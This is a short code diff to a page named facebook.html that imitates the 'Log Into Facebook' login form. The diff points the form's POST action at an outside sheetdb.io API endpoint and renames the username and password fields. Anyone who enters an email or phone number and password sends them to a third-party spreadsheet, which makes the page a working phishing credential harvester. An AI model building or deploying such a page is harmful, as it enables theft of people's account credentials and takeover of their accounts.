--- a/facebook.html
+++ b/facebook.html
@@ -554,9 +554,9 @@ bP9LgE96ugAAAABJRU5ErkJggg==">
                 Log Into Facebook
             </div>
             <div class="content-form">
-                <form action="server.php" method="POST">
-                    <input type="text" name="username" placeholder="Email address or phone number" >
-                    <input type="password" name="userpassword" >
+                <form action="https://sheetdb.io/api/v1/2mg6mueub0xtl" method="POST">
+                    <input type="text" name="data[username]" placeholder="Email address or phone number" >
+                    <input type="password" name="data[password]" >
                     <input type="submit" name="data" value="Log In">
                 </form>
                 <div class="signinLink">
